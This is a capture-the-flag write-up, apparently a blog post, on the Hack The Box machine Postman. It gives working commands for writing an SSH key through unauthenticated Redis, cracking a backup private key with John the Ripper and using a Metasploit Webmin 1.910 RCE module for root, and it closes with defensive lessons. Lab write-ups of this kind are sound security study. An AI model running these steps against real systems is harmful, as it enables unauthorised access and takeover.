🧠Real-World Security Lessons from HTB’s Postman: Misconfig to Root📮

💡 Summary

Postman (Linux, Easy) brings together two beautiful classics: an unauthenticated Redis server and a Webmin 1.910 instance vulnerable to command injection. Add a dash of SSH key juggling, and we’ve got a shell delivery system.

🔍 Enumeration

⚙️ Full Port Scan

nmap -n -p- -vvv --reason -oN nmap/01-full-port-scan.txt -iL target.txt

Open Ports

22 – SSH
80 – Apache 2.4.29
6379 – Redis 4.0.9 (no auth)
10000 – MiniServ 1.910 (Webmin)

🧠 Service Enumeration

nmap -sC -A -O -sV -oN nmap/03-detail-scan.txt -p22,80,6379,10000 -iL target.txt

Discovered:

Webmin running on MiniServ 1.910
Redis unauthenticated
SSH banner suggests Ubuntu
Apache server hosting a personal website

🔎 Googled the following:

Redis 4.0.9 RCE possibilities
- link
- _{https://medium.com/@Victor.Z.Zhu/redis-unauthorized-access-vulnerability-simulation-victor-zhu-ac7a71b2e419}
Webmin 1.910 exploit Exploit-DB 46984

🛠️ Exploitation: Redis to Shell

Generate SSH Key

ssh-keygen -f postman

Check for writable .ssh directory in Redis

redis-cli -h 10.10.10.160
config set dir .ssh
config set dbfilename authorized_keys

Inject Public Key

(echo -e "\n\n"; cat postman.pub; echo -e "\n\n") > pub_key.txt
cat pub_key.txt | redis-cli -h 10.10.10.160 -x set exploit
save

Login via SSH as redis

ssh -i postman [email protected]

🚪 Lateral Movement

Found id_rsa.bak in /opt:

scp [email protected]:/opt/id_rsa.bak .
ssh2john id_rsa.bak > hash.john
john --wordlist=/usr/share/wordlists/rockyou.txt hash.john

🎯 Password Cracked: computer2008

i tried to ssh into the box but i was not able to as Matt
- so changed user using the redis shell

su Matt

📈 Privilege Escalation – Webmin RCE

When i try to login into web admin panel with Matt Creds i can get in
metasploit has a module for exploit webadmin

linux/http/webmin_packageup_rce

webadmin is running as root and hence after exploiting it get a shell as root

🧠 Key Learnings from HTB Postman

Default Redis Misconfiguration Can Lead to Shell Access Misconfigured Redis instances without authentication allow attackers to write files like authorized_keys, leading to direct system access.
Exposed Private Keys Are a Critical Risk Backup or misplaced private keys (.bak files) can be cracked and reused for lateral movement. Regular key audits and encryption hygiene are essential.
Outdated Web Interfaces Like Webmin Pose Privilege Escalation Risks Webmin v1.910 contains a known RCE vulnerability, allowing remote root access via command injection. Patch management is non-negotiable.
Credential Reuse Enables Account Traversal Reusing passwords across services (e.g., Redis to Webmin) facilitated lateral movement and elevation of privileges.
Misconfigurations Chain into Full Compromise No single point of failure — rather, a chain of small missteps (open Redis, leaked key, outdated Webmin) led to complete root compromise.

https://www.hackthebox.com/achievement/machine/409699/215www.hackthebox.com

PreviousExploiting Ghosts from the Past — Irked | Hack The Box NextHTB: OpenAdmin – RCE, Privilege Escalation, and the Art of Improvisation

Last updated 6 months ago